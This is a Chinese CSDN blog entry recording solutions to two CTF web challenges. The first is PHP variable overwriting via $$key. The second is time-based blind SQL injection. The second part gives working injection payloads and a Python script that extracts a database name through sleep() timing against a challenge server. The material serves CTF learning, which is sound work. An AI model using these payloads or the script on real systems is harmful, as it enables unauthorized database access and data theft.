ctf web方向与php学习记录33

最新推荐文章于 2024-05-30 14:52:09 发布
最新推荐文章于 2024-05-30 14:52:09 发布
阅读量251 收藏
点赞数
文章标签: sql post
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46203060/article/details/113840854
版权

这次博客是日常分享

一,弱类型变量

1概述

这道题来自[新年快乐也不能忘记学习杯]弱类型变量,一场四校联合举办的ctf。是一道较为简单的弱类型变量。

2源码

  <?php
highlight_file(__FILE__);
$_200='yooo~';
$_404='Nooo~';
include ("flag.php");
if($_SERVER["REQUEST_METHOD"]!='POST')
{
    die("WTF? Did you see the code?");
}
if(!isset($_POST['ynpc']))
{
    die("come on");
}
foreach ($_GET as $key => $value) {
    $$key=$value;
}
foreach ($_POST as $key => $value) {
    $$key=$value;
}
var_dump($_POST['ynpc']);
if($_POST['ynpc'] === $hhhh)
{
    echo $flag;
}
die($_200);
?> WTF? Did you see the code?

3解析

在这里插入图片描述采用我的思路解的话,playoad如下
url?=_200=$hhhh(GET)
hhhh=a&ynpc=a(POST)

4分析

解析来源于做题时候的总结,这里着重分析一下官方wp给出的playload。
url?hhhh=11(GET)
ynpc=11(POST)
其实之所以可以这样做的原因是来源于

foreach ($_GET as $key => $value) {
    $$key=$value;
}

这段代码。
其中$$key=$value;所以GET方式的实际传参为$hhhh=11,而像网上一道相类似的题目中

$$key=$$value;

会使得传参变量覆盖,而本题并没有使用变量覆盖的方法将flag传递后输出,所以解析中的方法url?=_200=$hhhh这一步有些多次一举了。(后去尝试了一下POST hhhh=a&ynpc=a 同样可以的,额,其实不用测试也可以知道的)

二,时间注入

1概述

这道题同样来自[新年快乐也不能忘记学习杯],叫fishing,明显的提示是钓鱼网站。做题的时候实在没想到是注入,因为扫出来的login.php是空白页,然后登录页面首先展示的是二维码登录,便没有继续关注了。
在这里插入图片描述

2解析

(根据官方的wp,eken)可以sql一把梭而且没有任何过滤,就应该也可以手注,那么身为小白的我,自然肯定不会放弃这次时间盲注的实践机会(毕竟ctfhub上的时间盲注是直接sqlmap做的,手动滑稽)。

(1)sqlmap解法

好像还要设置headers(主要是sqlmap没学到位),没有去研究,如果有看来博客大佬能把帮忙在评论区回复一下吗?
问题:如何使用sqlmap对一下内容进行注入(POST方式的嵌入式注入)?
在这里插入图片描述

(2)手注

下面是手注的playload,这里当然不会一个一个的去尝试啦~~

u=12341234' and if(length(database())>1,sleep(3),1) and '&p=123123&button=%E7%99%BB+%E5%BD%95    (判断数据库长度为10)
u=12341234' and if(ascii(substr(database(),1,1))>1,sleep(3),1) and '&p=123123&button=%E7%99%BB+%E5%BD%95(爆库)
u=12341234' and if((ascii(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),",str(j),",1)))=",str(ord(i)),",sleep(3),1) and '&p=123123&button=%E7%99%BB+%E5%BD%95(爆表)
u=12341234' and if((ascii(substr((select column_name from information_schema.columns where table_name='fl44444g' and table_schema='challenges' limit 0,1),",str(j),",1)))=",str(ord(i)),",sleep(3),1) and '&p=123123&button=%E7%99%BB+%E5%BD%95(爆字段)
u=12341234' and if((ascii(substr((select flag from fl44444g limit 0,1),",str(j),",1)))=",str(ord(i)),",sleep(3),1) and '&p=123123&button=%E7%99%BB+%E5%BD%95(爆字符串)

(下方爆字符串小剧场)
在这里插入图片描述
在使用playload之前需要使用bp进行验证,可以直接用爆库长的playload进行验证。
在这里插入图片描述可以看见右下角的3,027很显然,注入成功。
下面就附上本次注入的脚本——就附上爆库名的吧。(这里要说明一下,脚本采用的是post data格式的,为不是get ?参数的格式)

#python3
def database_name(num):
    name = ''
    headers = {'Host': '106.54.24.23:20004',
               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0',
               'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
               'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
               'Accept-Encoding': 'gzip,deflate',
               'Content-Type': 'application/x-www-form-urlencoded',
               'Content-Length': '105',
               'Origin': 'http://106.54.24.23:20004',
               'Connection': 'close',
               'Referer': 'http://106.54.24.23:20004/login.html',
               'Cookie': 'session=e524499c-5f1c-4acd-a0a4-ee32236237ce.bXFJvIi_LSncbB8fI50fgYTVQQY;__aegis_uid=1613943549030-8023',
               'Upgrade-Insecure-Requests': '1'
               }
    url = 'http://106.54.24.23:20004/login.php'
    for j in range(1,num+1):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz_?><':
            data = ["u=12341234'%20and%20if(ascii(substr(database(),",str(j),",1))%3d", str(ord(i)),
                    ",sleep(3),1)%20and%20'&p=123123&button=%E7%99%BB+%E5%BD%95"]
            data = ''.join(data)
            time1 = datetime.datetime.now()
            r = requests.post(url,headers=headers,data=data)
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 3:
                name += i
                print(name)
                break
    print('database_name:', name)
这周末在做梦
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
ctf web方向php学习记录12
这周末在做梦的博客
09-17 165
接下来是秋名山老司机,不断刷新得下图 然后写py脚本计算 import requests url ="http://123.206.87.240:8002/qiumingshan/" s = requests.Session() req = s.get(url) a = req.text[req.text.find('<div>')+5:req.text.find('=?')] aa = eval(a) d = {'value':aa} req = s.post(url,data=d) p
ctf web方向php学习记录10
这周末在做梦的博客
09-02 262
在备份是个好习惯中,本人有一个地方无法理解,接下来将解题步骤写出。 首先,利用SourceLeakHacker漏洞扫描器扫描发现如下 flag.php是空白的,那就选择bak,网页进入后是下载了一个index.php.bak文件,利用phpstorm查看 然后,就出现了md5加密函数,通过代码可知,只要破解了if中的矛盾就可以拿到flag,然后就开始百度,直到出现了kekeyy和kkeyey破解方法,一脸懵逼(不知道kekeyy和kkeyey是怎么回事)。只知道md5不能加密数组,md5有特定的科学计数法的
ctf web方向php学习记录4
这周末在做梦的博客
08-20 178
一,有关web3的题目,就是一道unicode转译ASCLL的题目,为此,我去了解了一下什么是unicode。 如下: 如果要表示中文,显然一个字节是不够的,至少需要两个字节,而且还不能和ASCII编码冲突,所以,中国制定了GB2312编码,用来把中文编进去。类似的,日文和韩文等其他语言也有这个问题。为了统一所有文字的编码,Unicode应运而生。Unicode把所有语言都统一到一套编码里,这样就不会再有乱码问题了。 Unicode通常用两个字节表示一个字符,原有的英文编码从单字节变成双字节,只需要把高字
ctf web方向PHP学习记录3
这周末在做梦的博客
08-18 155
今天,首先将web基础post做了,之后的学习记录在补充相关知识的详细内容。解法如图,下面附hackbar的使用教程(搜集的一部分): 1网址的载入与访问: hackbar的一个特点就是在地址栏下面加了一个大框框,这样的话对于一些较长得url可以更加方便的查看了,load url是将地址栏中的网络复制到hackbar中,这样的话我们就可以进行一些试,在hackbar中回车是换行的意思,所以我们要点击execute来访问hackbar中的网址。 2联合查询: 在sql注入中有一个联合查询,比如字段数是11要是
ctf web方向php学习记录21之ping
这周末在做梦的博客
10-19 750
Ping是Windows、Unix和Linux系统下的一个命令。ping也属于一个通信协议,是TCP/IP协议的一部分。利用“ping”命令可以检查网络是否连通,可以很好地帮助我们分析和判定网络故障。 Windows系统支持的管道符: “|”:直接执行后面的语句。 “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 “&&”:如果前面的语句为假则直接出错,也不执行后面的语
ctf web方向php学习记录22
这周末在做梦的博客
10-21 176
一,php://input 首先查看当前目录,无有效信息,再查看上级目录试试,发现flag文件,使用命令打开即可。 二,远程包含 与上一道题目步骤一摸一样,不在赘述。 三,读取源代码 使用filter过滤器 url+?file=php://filter/resource=/flag即可。 四,知识点 1php:// php://— 访问各个输入/输出流(I/O streams)。 PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符,内存中、磁盘备份的临时文件
ctf web方向php学习记录8
这周末在做梦的博客
08-27 192
IP是Internet Protocol(网际互连协议)的缩写,是TCP/IP体系中的网络层协议。设计IP的目的是提高网络的可扩展性:一是解决互联网问题,实现大规模、异构网络的互联互通;二是分割顶层网络应用和底层网络技术之间的耦合关系,以利于两者的独立发展。根据端到端的设计原则,IP只为主机提供一种无连接、不可靠的、尽力而为的数据报传输服务。 $remote_addr 是nginx与客户端进行TCP连接过程中,获得的客户端真实地址. Remote Address 无法伪造,因为建立 TCP 连接需要三次握手
ctf web方向php学习记录29
这周末在做梦的博客
11-27 770
这里分享一道HECTF的题目 【BOOM】ezphp 一,源码 <?php error_reporting(0); highlight_file(__file__); include('flag.php'); $string_1 = $_GET['str1']; $string_2 = $_GET['str2']; if($_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2']
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
CTF-网络挑战使用PHPWeb中进行CTF挑战链接: :
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
CTF-web学习大纲
01-30
CTF-web学习大纲
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
基础—SQL—DQL(数据查询语言)聚合函数
最新发布
m0_74363339的博客
05-30 377
这篇博客主要讲到了SQL分类中的DQL(数据查询语言)—聚合函数的讲解,聚合函数比较简单,但它主要配合着分组查询进行数据查询的操作,注意NULL的字段值不参与聚合函数的运算......
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
lxcw_sir的博客
05-29 366
SQL Server定期收缩日志文件详细步骤——基于SQL Server 2012
PostgreSQL常用插件
PGCCC的博客
05-29 531
1.提供 PostgreSQL 实例的操作系统级别的资源使用情况,包括缓存命中率和磁盘 IO 等。通过使用这些插件,您可以大大增强 PostgreSQL 的功能,满足各种复杂的应用需求。1.提供三元组(trigram)相似度匹配和索引功能,常用于模糊搜索和文本相似度匹配。1.增加对地理空间数据的支持,使 PostgreSQL 成为一个功能强大的空间数据库。1.PostgreSQL 的过程语言,允许用户编写存储过程和触发器。1.基于逻辑复制的插件,提供更细粒度的数据复制控制和双向复制能力。
postgressql——Tuple学习(2)
Re_view的博客
05-27 281
postgressql——Tuple学习(2)
PostgreSQL发展史
PGCCC的博客
05-28 934
PostgreSQL 的发展史反映了其从学术研究项目到全球领先的开源数据库系统的演变过程。通过不断的创新和社区支持,PostgreSQL 已经成为一个功能强大、性能优越的数据库管理系统,广泛应用于各个行业的关键业务场景中。#postgresql培训。
ctf web方向怎么学习
04-27
如果你想学习CTF Web方向,建议你掌握一些基本的技能,如Web开发和网络安全知识。可以从以下几个方面入手学习: 1. 学习Web开发:HTML、CSS、JavaScript、PHP、ASP.NET等等。 2. 学习网络知识:如HTTP协议、TCP/IP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这周末在做梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值